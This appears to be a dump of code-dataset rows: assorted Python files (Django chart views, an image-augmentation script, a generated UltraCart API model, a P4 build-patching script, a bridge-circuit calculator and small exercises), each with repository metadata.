image_base64_1 = createBarChart(keys, values, 'Count', 'Oakland Crime Rate 2011-2016', configs=config)
return render(
request,
'analyzer/case3.html',
{
'report4a':image_base64,
'report4b':image_base64_1,
}
)
#google play app report 1
def report1(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=1)
image_base64 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category > 400')
return render(
request,
'analyzer/main.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
}
)
#google play app report 2
def report2(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=2)
config = {'rotation':90}
image_base64 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category < 400', configs=config)
return render(
request,
'analyzer/main.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
}
)
#google play app report 3
def report3(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=1)
image_base64 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category > 400 ')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=2)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category < 400', configs=config)
return render(
request,
'analyzer/main1.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
'image_base64_1':image_base64_1,
}
)
def report4(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=4)
image_base64 = createPieChart(keys, values, 'Oakland Crime Rate 2011-2016')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=4)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Count', 'Oakland Crime Rate 2011-2016', configs=config)
return render(
request,
'analyzer/main1.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
'image_base64_1':image_base64_1,
}
)
def report5(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=5)
image_base64 = createPieChart(keys, values, 'India trade import 2010-2018')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=5)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Total(millions $USD)', 'India trade import 2010-2018', configs=config)
return render(
request,
'analyzer/main1.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
'image_base64_1':image_base64_1,
}
)
def report6(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=6)
image_base64 = createPieChart(keys, values, 'India trade export 2010-2018')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=6)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Total(millions $USD)', 'India trade export 2010-2018', configs=config)
return render(
request,
'analyzer/main1.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
'image_base64_1':image_base64_1,
}
) | 35.418803 | 131 | 0.595077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,917 | 0.231298 |
5f9a0e11f9d9a926bf4cc162d77896b7f50869b6 | 4,668 | py | Python | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | null | null | null | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | 4 | 2020-07-24T19:31:51.000Z | 2022-03-12T00:41:28.000Z | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | null | null | null | from mxnet import nd
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..')))
import utils.common as dataset_commons
import cv2
import numpy as np
import glob
import pandas as pd
from gluoncv.data.transforms.presets.ssd import SSDDefaultTrainTransform
from matplotlib import pyplot as plt
'''
This code only gives you a tool to visualize
the images pointed in the csv file and the related bounding boxes using openCV
'''
data_common = dataset_commons.get_dataset_files()
# classes_keys = [key for key in data_common['classes']]
def apply_transformation(img_width, img_height, image, label):
if not isinstance(image, nd.NDArray):
image = nd.array(image)
if image.shape[0] == 3:
image = tensor_to_image(image)
image = nd.array(image)
label = np.array(label)
transform = SSDDefaultTrainTransform(img_width, img_height)
image, label = transform(image, label)
return image, label
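# Note (not in the original): SSDDefaultTrainTransform applies random
# augmentation and resizing, returning the image as a CHW float tensor and
# the bounding boxes remapped into the new img_width x img_height frame.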
def tensor_to_image(tensor):
image = tensor.asnumpy()*255
image = image.astype(np.uint8)
image = image.transpose((1, 2, 0)) # Move channel to the last dimension
return image
def save_image(image, images_path_save, new_images_name):
if not isinstance(image, np.ndarray):
image = tensor_to_image(image)
cv2.imwrite(images_path_save + '{0:04}'.format(new_images_name) + '.jpg', image)
def print_image(image, bbox, label):
if not isinstance(image, np.ndarray):
image = tensor_to_image(image)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # OpenCV uses BGR orde
xmin = int(bbox[0][0])
ymin = int(bbox[0][1])
xmax = int(bbox[0][2])
ymax = int(bbox[0][3])
cv2.rectangle(image, (xmin, ymin), (xmax, ymax), (255, 0, 0), 1)
cv2.putText(image, 'label: ' + str(label), (xmin, ymin-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0))
cv2.imshow('img', image)
a = cv2.waitKey(0)
return a
def load_images_from_csv_and_augment(images_path, csv_path, images_path_save, img_width, img_height):
train_samples = pd.read_csv(csv_path)
csv_list = []
    # numbering of the new images. The new images will get new names: 0000.jpg, etc.
    # for that, num_new_images below will be used
new_images_name = 0
# number of new images generated from the original image
num_new_images = 4
for i, row in train_samples.iterrows():
# Reading data from the csv file
image_name_with_extension = row['image']
label = row['label']
xmin = int(row['xmin'])
ymin = int(row['ymin'])
xmax = int(row['xmax'])
ymax = int(row['ymax'])
bbox = [[xmin, ymin, xmax, ymax]]
filename = glob.glob(images_path + "/" + image_name_with_extension)[0]
img = cv2.imread(filename)
for i in range(0, num_new_images+1): # +1 to account for the original image
value = ('{0:04}'.format(new_images_name) + '.jpg',
int(bbox[0][0]),
int(bbox[0][1]),
int(bbox[0][2]),
int(bbox[0][3]),
label
)
csv_list.append(value)
cv2.startWindowThread()
# a = print_image(img, bbox, label)
# if a == 27:
# break
# cv2.destroyWindow('img')
print('Saving image: ', '{0:04}'.format(new_images_name), '.jpg')
save_image(img, images_path_save, new_images_name)
img, bbox = apply_transformation(img_width, img_height, img, bbox)
new_images_name += 1
# if a == 27:
# break
column_name = ['image', 'xmin', 'ymin', 'xmax', 'ymax', 'label']
csv_converter = pd.DataFrame(csv_list, columns=column_name)
return csv_converter
if __name__ == "__main__":
source_images_path = data_common['image_folder']
source_csv_path = data_common['csv_path']
# TODO: Set the file save path
images_path_save = 'images_augmented/' # Folder that will contain the resized images
csv_path_save = 'images_augmented/csv/val_dataset.csv'
img_height = 300
img_width = 300
    # Create the output folders before any image is written; cv2.imwrite
    # fails silently when the target directory does not exist.
    if not os.path.exists(images_path_save):
        try:
            os.makedirs(images_path_save + 'csv')
        except OSError as e:
            if e.errno != errno.EEXIST:
                raise
    csv_converter = load_images_from_csv_and_augment(source_images_path, source_csv_path, images_path_save, img_width, img_height)
csv_converter.to_csv(csv_path_save, index=None)
print('Successfully converted to a new csv file.')
| 33.826087 | 130 | 0.633248 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 989 | 0.211687 |
5f9a91b6b4cb83726c16979ae7cd27a95c8fd08d | 12,235 | py | Python | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | 1 | 2018-03-15T16:56:23.000Z | 2018-03-15T16:56:23.000Z | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApplyLibraryItemResponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'attributes': 'list[LibraryItemAttribute]',
'cjson': 'str',
'content_type': 'str',
'email_template_vm_path': 'str',
'error': 'Error',
'metadata': 'ResponseMetadata',
'storefront_oid': 'int',
'success': 'bool',
'title': 'str',
'uuid': 'str',
'warning': 'Warning'
}
attribute_map = {
'attributes': 'attributes',
'cjson': 'cjson',
'content_type': 'content_type',
'email_template_vm_path': 'email_template_vm_path',
'error': 'error',
'metadata': 'metadata',
'storefront_oid': 'storefront_oid',
'success': 'success',
'title': 'title',
'uuid': 'uuid',
'warning': 'warning'
}
def __init__(self, attributes=None, cjson=None, content_type=None, email_template_vm_path=None, error=None, metadata=None, storefront_oid=None, success=None, title=None, uuid=None, warning=None): # noqa: E501
"""ApplyLibraryItemResponse - a model defined in Swagger""" # noqa: E501
self._attributes = None
self._cjson = None
self._content_type = None
self._email_template_vm_path = None
self._error = None
self._metadata = None
self._storefront_oid = None
self._success = None
self._title = None
self._uuid = None
self._warning = None
self.discriminator = None
if attributes is not None:
self.attributes = attributes
if cjson is not None:
self.cjson = cjson
if content_type is not None:
self.content_type = content_type
if email_template_vm_path is not None:
self.email_template_vm_path = email_template_vm_path
if error is not None:
self.error = error
if metadata is not None:
self.metadata = metadata
if storefront_oid is not None:
self.storefront_oid = storefront_oid
if success is not None:
self.success = success
if title is not None:
self.title = title
if uuid is not None:
self.uuid = uuid
if warning is not None:
self.warning = warning
@property
def attributes(self):
"""Gets the attributes of this ApplyLibraryItemResponse. # noqa: E501
Attributes from the library item # noqa: E501
:return: The attributes of this ApplyLibraryItemResponse. # noqa: E501
:rtype: list[LibraryItemAttribute]
"""
return self._attributes
@attributes.setter
def attributes(self, attributes):
"""Sets the attributes of this ApplyLibraryItemResponse.
Attributes from the library item # noqa: E501
:param attributes: The attributes of this ApplyLibraryItemResponse. # noqa: E501
:type: list[LibraryItemAttribute]
"""
self._attributes = attributes
@property
def cjson(self):
"""Gets the cjson of this ApplyLibraryItemResponse. # noqa: E501
Cjson from library item, only populated if this library item was a cjson snippet or marketing email (not transactional) # noqa: E501
:return: The cjson of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._cjson
@cjson.setter
def cjson(self, cjson):
"""Sets the cjson of this ApplyLibraryItemResponse.
Cjson from library item, only populated if this library item was a cjson snippet or marketing email (not transactional) # noqa: E501
:param cjson: The cjson of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._cjson = cjson
@property
def content_type(self):
"""Gets the content_type of this ApplyLibraryItemResponse. # noqa: E501
flow, campaign, cjson, upsell, transactional_email or email # noqa: E501
:return: The content_type of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._content_type
@content_type.setter
def content_type(self, content_type):
"""Sets the content_type of this ApplyLibraryItemResponse.
flow, campaign, cjson, upsell, transactional_email or email # noqa: E501
:param content_type: The content_type of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._content_type = content_type
@property
def email_template_vm_path(self):
"""Gets the email_template_vm_path of this ApplyLibraryItemResponse. # noqa: E501
If a marketing email was applied, this is the path to the template encapsulating the cjson. This is needed for the UltraCart UI. # noqa: E501
:return: The email_template_vm_path of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._email_template_vm_path
@email_template_vm_path.setter
def email_template_vm_path(self, email_template_vm_path):
"""Sets the email_template_vm_path of this ApplyLibraryItemResponse.
If a marketing email was applied, this is the path to the template encapsulating the cjson. This is needed for the UltraCart UI. # noqa: E501
:param email_template_vm_path: The email_template_vm_path of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._email_template_vm_path = email_template_vm_path
@property
def error(self):
"""Gets the error of this ApplyLibraryItemResponse. # noqa: E501
:return: The error of this ApplyLibraryItemResponse. # noqa: E501
:rtype: Error
"""
return self._error
@error.setter
def error(self, error):
"""Sets the error of this ApplyLibraryItemResponse.
:param error: The error of this ApplyLibraryItemResponse. # noqa: E501
:type: Error
"""
self._error = error
@property
def metadata(self):
"""Gets the metadata of this ApplyLibraryItemResponse. # noqa: E501
:return: The metadata of this ApplyLibraryItemResponse. # noqa: E501
:rtype: ResponseMetadata
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this ApplyLibraryItemResponse.
:param metadata: The metadata of this ApplyLibraryItemResponse. # noqa: E501
:type: ResponseMetadata
"""
self._metadata = metadata
@property
def storefront_oid(self):
"""Gets the storefront_oid of this ApplyLibraryItemResponse. # noqa: E501
StoreFront oid where content originates necessary for tracking down relative assets # noqa: E501
:return: The storefront_oid of this ApplyLibraryItemResponse. # noqa: E501
:rtype: int
"""
return self._storefront_oid
@storefront_oid.setter
def storefront_oid(self, storefront_oid):
"""Sets the storefront_oid of this ApplyLibraryItemResponse.
StoreFront oid where content originates necessary for tracking down relative assets # noqa: E501
:param storefront_oid: The storefront_oid of this ApplyLibraryItemResponse. # noqa: E501
:type: int
"""
self._storefront_oid = storefront_oid
@property
def success(self):
"""Gets the success of this ApplyLibraryItemResponse. # noqa: E501
Indicates if API call was successful # noqa: E501
:return: The success of this ApplyLibraryItemResponse. # noqa: E501
:rtype: bool
"""
return self._success
@success.setter
def success(self, success):
"""Sets the success of this ApplyLibraryItemResponse.
Indicates if API call was successful # noqa: E501
:param success: The success of this ApplyLibraryItemResponse. # noqa: E501
:type: bool
"""
self._success = success
@property
def title(self):
"""Gets the title of this ApplyLibraryItemResponse. # noqa: E501
title of library item, usually the name of the flow or campaign, or description of cjson # noqa: E501
:return: The title of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this ApplyLibraryItemResponse.
title of library item, usually the name of the flow or campaign, or description of cjson # noqa: E501
:param title: The title of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._title = title
@property
def uuid(self):
"""Gets the uuid of this ApplyLibraryItemResponse. # noqa: E501
UUID of marketing email or communication flow/campaign if this library item was an email, campaign or flow # noqa: E501
:return: The uuid of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._uuid
@uuid.setter
def uuid(self, uuid):
"""Sets the uuid of this ApplyLibraryItemResponse.
UUID of marketing email or communication flow/campaign if this library item was an email, campaign or flow # noqa: E501
:param uuid: The uuid of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._uuid = uuid
@property
def warning(self):
"""Gets the warning of this ApplyLibraryItemResponse. # noqa: E501
:return: The warning of this ApplyLibraryItemResponse. # noqa: E501
:rtype: Warning
"""
return self._warning
@warning.setter
def warning(self, warning):
"""Sets the warning of this ApplyLibraryItemResponse.
:param warning: The warning of this ApplyLibraryItemResponse. # noqa: E501
:type: Warning
"""
self._warning = warning
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApplyLibraryItemResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplyLibraryItemResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.211735 | 213 | 0.621087 | 11,944 | 0.976216 | 0 | 0 | 7,599 | 0.621087 | 0 | 0 | 7,116 | 0.58161 |
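The class above is standard swagger-codegen output: private backing fields, pass-through property setters, and dict/str helpers driven by the class-level swagger_types map. A minimal usage sketch, assuming the class is imported from its generated SDK package (the field values are invented):

# Sketch only: exercising the generated helpers on ApplyLibraryItemResponse.
resp = ApplyLibraryItemResponse(content_type='cjson', success=True, title='Holiday banner')
resp.storefront_oid = 42      # setters simply assign; there is no validation layer
as_dict = resp.to_dict()      # walks swagger_types, recursing into nested models
assert as_dict['success'] is True
print(resp)                   # __repr__ -> to_str() -> pprint.pformat(to_dict())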
5f9b09cbcd120955bb173c4d9f5b1fd61f32f6e1 | 103 | py | Python | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | ["BSD-3-Clause"] | 65 | 2017-03-21T09:15:40.000Z | 2022-02-01T23:43:08.000Z | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | ["BSD-3-Clause"] | 100 | 2016-12-15T03:44:06.000Z | 2022-03-07T08:14:07.000Z | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | ["BSD-3-Clause"] | 52 | 2016-12-19T07:48:52.000Z | 2022-02-19T17:53:48.000Z | np_pressures_hPa * math.exp(-gravit_acc * molar_mass_earth * height/(gas_constant*standard_temperature)) | 103 | 103 | 0.84466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
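The solution snippet embedded in the row above is the isothermal barometric formula, p(h) = p0 * exp(-g*M*h / (R*T)). A self-contained version with standard values for the constants (the variable names mirror the snippet; the input pressures and height are invented):

import math
import numpy as np

gravit_acc = 9.81               # m/s^2
molar_mass_earth = 0.02896      # kg/mol, molar mass of dry air
gas_constant = 8.3145           # J/(mol*K)
standard_temperature = 288.15   # K

np_pressures_hPa = np.array([1013.25, 1000.0])   # starting pressures in hPa
height = 1000.0                                  # metres above the reference level

# the exp factor is ~0.888 at 1000 m, so 1013.25 hPa drops to roughly 900 hPa
pressures_at_height = np_pressures_hPa * math.exp(
    -gravit_acc * molar_mass_earth * height / (gas_constant * standard_temperature))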
5f9b8fe1beadc23d6a4c015ccb7948ee8af7a618 | 322 | py | Python | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | ["MIT"] | null | null | null | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | ["MIT"] | null | null | null | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | ["MIT"] | null | null | null | from pytest import mark
# if setup.py is present, the code can be installed as a library,
# so there's no need to include the path:
# pip install -e .
from pytest_resources import do_lower_case
# from src.for_testing import do_lower_case
@mark.coverage
def check_lower_case():
assert do_lower_case('SomeThing') == 'something'
| 24.769231 | 57 | 0.773292 | 0 | 0 | 0 | 0 | 91 | 0.282609 | 0 | 0 | 178 | 0.552795 |
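Two details worth knowing about the test above: pytest only collects functions prefixed with test by default, so the check_* name implies a python_functions override in the project's pytest configuration, and @mark.coverage is a custom marker that would normally be registered there as well. A purely illustrative stand-in for the imported helper:

def do_lower_case(value):
    """Illustrative stand-in for pytest_resources.do_lower_case."""
    return value.lower()

assert do_lower_case('SomeThing') == 'something'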
5f9c3b49af1837552a765743d83f19677ef7b0fe | 3,476 | py | Python | targets/simple_router/flow_radar_bm/change_bm.py | tsihang-zz/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | ["Apache-2.0"] | 15 | 2018-08-21T10:49:38.000Z | 2021-06-23T14:33:32.000Z | targets/simple_router/flow_radar_bm/change_bm.py | harvard-cns/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | ["Apache-2.0"] | 1 | 2017-10-16T07:49:06.000Z | 2017-10-16T13:45:36.000Z | targets/simple_router/flow_radar_bm/change_bm.py | USC-NSL/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | ["Apache-2.0"] | 6 | 2016-07-26T15:47:46.000Z | 2018-03-23T01:50:06.000Z | import re
import os
def changed(lines, token):
for line in lines:
if line.find(token) != -1:
return True
return False
# copy required files
def copy_files():
os.system("cp flow_radar.h ../build/bm/src")
# change actions.c to add flow_radar lock
def change_actions_c():
actions_c = open("../build/bm/src/actions.c","r")
lines = actions_c.readlines()
actions_c.close()
if changed(lines, '#include "flow_radar.h"'):
return
actions_c = open("../build/bm/src/actions.c","w")
lock_flag = 0
include_flag = 1
for line in lines:
if lock_flag == 1:
m = re.search("^}$", line)
if m != None:
actions_c.write(" unlock_flow_radar();\n")
lock_flag = 0
actions_c.write(line)
if include_flag == 1:
m = re.search("^\*/", line)
if m != None:
actions_c.write('#include "flow_radar.h"\n')
include_flag = 0
if line.find("void action_update_flow_radar") != -1:
actions_c.write(" lock_flow_radar();\n")
lock_flag = 1
actions_c.close()
# change p4_pd_rpc_server.ipp
def change_p4_pd_rpc_server_ipp():
file = open("../build/bm/src/p4_pd_rpc_server.ipp","r")
lines = file.readlines()
file.close()
if changed(lines, '#include "flow_radar.h"'):
return
file = open("../build/bm/src/p4_pd_rpc_server.ipp","w")
key_reg = ["flow_xor_srcip","flow_xor_dstip", "flow_xor_srcport", "flow_xor_dstport", "flow_xor_prot", "flow_count", "packet_count", "flow_filter"]
size = {}
field = ""
for line in lines:
for key in key_reg:
if line.find("void register_read_whole_%s"%key) != -1:
field = key
if field != "":
m = re.search("int8_t ret\[(.*)\];", line)
if m != None:
size[field] = m.group(1)
field = ""
total_size = "(%s)"%size[key_reg[0]]
for key in key_reg[1:]:
total_size += " + (%s)"%size[key]
file.write('extern "C" {\n')
file.write('#include "flow_radar.h"\n')
file.write('}\n')
for line in lines:
file.write(line)
if line.find("// REGISTERS") != -1:
file.write(" void dump_flow_radar(std::vector<int8_t> & _return, const SessionHandle_t sess_hdl, const DevTarget_t& dev_tgt) {\n")
file.write(" p4_pd_dev_target_t pd_dev_tgt;\n")
file.write(" pd_dev_tgt.device_id = dev_tgt.dev_id;\n")
file.write(" pd_dev_tgt.dev_pipe_id = dev_tgt.dev_pipe_id;\n")
file.write(" int8_t ret[%s];\n"%total_size)
file.write(" lock_flow_radar();\n")
ret = "ret"
for key in key_reg:
file.write(" p4_pd_simple_router_register_read_whole_%s(sess_hdl, pd_dev_tgt, %s);\n"%(key, ret))
file.write(" p4_pd_simple_router_register_clean_%s(sess_hdl, pd_dev_tgt);\n"%(key))
ret += " + (%s)"%size[key]
file.write(" unlock_flow_radar();\n")
file.write(" _return.resize(%s);\n"%total_size)
file.write(" for (int i = 0; i < _return.size(); i++)\n")
file.write(" _return[i] = ret[i];\n")
file.write(" }\n")
file.close()
def change_p4_pd_rpc_thrift():
file = open("../build/bm/thrift/p4_pd_rpc.thrift","r")
lines = file.readlines()
file.close()
if changed(lines, "list<byte> dump_flow_radar"):
return
file = open("../build/bm/thrift/p4_pd_rpc.thrift","w")
for line in lines:
file.write(line)
if line.find("# registers") != -1:
file.write(" list<byte> dump_flow_radar(1:res.SessionHandle_t sess_hdl,\n")
file.write(" 2:res.DevTarget_t dev_tgt);\n")
file.close()
if __name__ == "__main__":
copy_files()
change_actions_c()
change_p4_pd_rpc_server_ipp()
change_p4_pd_rpc_thrift()
| 31.035714 | 148 | 0.649597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,553 | 0.446778 |
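The rewrite pattern change_bm.py repeats (read all lines, stream them back out, and splice new lines in when a pattern fires) generalizes to a small helper. A sketch; the helper name is mine, not from the repo:

import re

def splice_after(path, pattern, new_line):
    """Rewrite `path` in place, inserting `new_line` after every line matching `pattern`."""
    with open(path) as fh:
        lines = fh.readlines()
    with open(path, 'w') as fh:
        for line in lines:
            fh.write(line)
            if re.search(pattern, line):
                fh.write(new_line + '\n')

# e.g. splice_after('actions.c', r'void action_update_flow_radar', '  lock_flow_radar();')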
5f9c54619428b0b6d3296e3c0080e9ec17335d9c | 2,807 | py | Python | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | ["MIT"] | null | null | null | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | ["MIT"] | null | null | null | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | ["MIT"] | null | null | null | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# calculation tool for a bridge circuit with two input current sources
# two current sources can supply from both of top of the bridge and middle of the bridge
# define the voltage name as follows:
# Vp: voltage at the top of the bridge
# Vn: voltage at the middle of the bridge
def paraR(R1, R2):
return R1*R2/(R1+R2)
def unbalanced_bridge( I = 1, Ra = 1, Rb = 1, Rc = 1, Rd = 1, Re = 1, Rf = 1):
print("# --- calc unbalanced bridge ---------------")
# params
print("I=", I, "A")
print("Ra=", Ra, "ohm")
print("Rb=", Rb, "ohm")
print("Rc=", Rc, "ohm")
print("Rd=", Rd, "ohm")
print("Re=", Re, "ohm")
print("Rf=", Rf, "ohm")
# delta-Y transpose
denom = Ra + Rb + (Rc + Rd)
Ralpha = Ra * Rb / denom
Rbeta = (Rc + Rd) * Ra / denom
Rgamma = Rb * (Rc + Rd) / denom
print("denom=", denom, "ohm")
print("Ralpha=", Ralpha, "ohm")
print("Rbeta=", Rbeta, "ohm")
print("Rgamma=", Rgamma, "ohm")
# I sprit
Il = (Rgamma + Rf) / ((Rbeta + Re) + (Rgamma + Rf)) * I
Ir = (Rbeta + Re) / ((Rbeta + Re) + (Rgamma + Rf)) * I
print("Il=", Il, "A")
print("Ir=", Ir, "A")
# calc Vtop and Vmid
Vl = Re * Il
Vr = Rf * Ir
print("Vl=", Vl, "V")
print("Vr=", Vr, "V")
Vtop = (Ralpha + (paraR((Rbeta + Re), (Rgamma + Rf)))) * I
Vmid = (Rd * Vl + Rc * Vr) / (Rc + Rd)
print("Vtop=", Vtop, "V")
print("Vmid=", Vmid, "V")
return Vtop, Vmid
def main():
# current of two input sources
current1 = 2.5e-3
current2 = 1.25e-3
    # unbalanced bridge params
# branch on input side
Ra = 100
Rb = 100
# bridge part (series resistor)
Rc = 100
Rd = 100
# branch on ground side
Re = 50
Rf = 50
current1 = 2
current2 = 1
Vtop1, Vmid1 = unbalanced_bridge(current1, Ra, Rb, Rc, Rd, Re, Rf)
Vtop2, Vmid2 = unbalanced_bridge(current2, Ra, Rb, Rc, Rd, Re, Rf)
print("# --- sum based on superposition theorem ---------------")
print("# when two current sources supply from top")
Vp = Vtop1 + Vtop2
Vn = Vmid1 + Vmid2
print("Vp=", Vp, "V")
print("Vn=", Vn, "V")
# same meaning
# unbalanced_bridge(current1+current2, Ra, Rb, Rc, Rd, Re, Rf)
print("# when current1 from the top, current2 from the middle")
Vp = Vtop1 + Vmid2
Vn = Vmid1 + Vtop2
print("Vp=", Vp, "V")
print("Vn=", Vn, "V")
print("# when current2 from the top, current1 from the middle")
Vp = Vmid1 + Vtop2
Vn = Vtop1 + Vmid2
print("Vp=", Vp, "V")
print("Vn=", Vn, "V")
print("# when two current sources from middle")
Vp = Vmid1 + Vmid2
Vn = Vtop1 + Vtop2
print("Vp=", Vp, "V")
print("Vn=", Vn, "V")
if __name__ == '__main__':
main()
| 25.990741 | 88 | 0.540791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,126 | 0.40114 |
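Written out, the delta-Y step inside unbalanced_bridge treats the series pair Rc + Rd as one delta leg alongside Ra and Rb, giving the equivalent Y resistances

\[
R_\alpha = \frac{R_a R_b}{R_a + R_b + R_c + R_d}, \qquad
R_\beta = \frac{R_a (R_c + R_d)}{R_a + R_b + R_c + R_d}, \qquad
R_\gamma = \frac{R_b (R_c + R_d)}{R_a + R_b + R_c + R_d}
\]

which is exactly what the Ralpha, Rbeta and Rgamma lines compute.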
5f9c577bd20e78c6c12bbdda22baa4f5a81a595e | 618 | py | Python | Python/Armstrong_Number.py | shashwat-agarwal/hacktoberfest-2 | 552a4278ffd671603f8659562427b0f1ac5127a4 | ["Apache-2.0"] | 17 | 2020-10-02T03:28:33.000Z | 2020-10-24T04:08:30.000Z | Python/Armstrong_Number.py | shubhamgoel90/hacktoberfest | e7b1aa18485c4a080b2568910f82e98a5feb6f37 | ["Apache-2.0"] | 22 | 2020-10-01T20:00:56.000Z | 2020-10-31T01:56:10.000Z | Python/Armstrong_Number.py | shubhamgoel90/hacktoberfest | e7b1aa18485c4a080b2568910f82e98a5feb6f37 | ["Apache-2.0"] | 139 | 2020-10-01T19:51:40.000Z | 2020-11-02T19:58:19.000Z | #Program to check whether the number is an Armstrong number or not
#Ask user to enter the number
number=int(input("Enter the number you want to check armstrong: "))
#To calculate the length of number entered.
order=len(str(number))
#Initialise sum to 0
sum=0
temp=number
while temp>0:
num=temp%10
sum+=num**order
temp//=10
if (number==sum):
print("The number you have entered is an Armstrong number.")
else:
print("The number you have entered is not an Armstrong number.")
#OUTPUT:
#Enter the number you want to check armstrong: 1634
#The number you have entered is an Armstrong number.
| 21.310345 | 68 | 0.723301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 429 | 0.694175 |
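A worked check of the sample run above: 1634 has four digits, and

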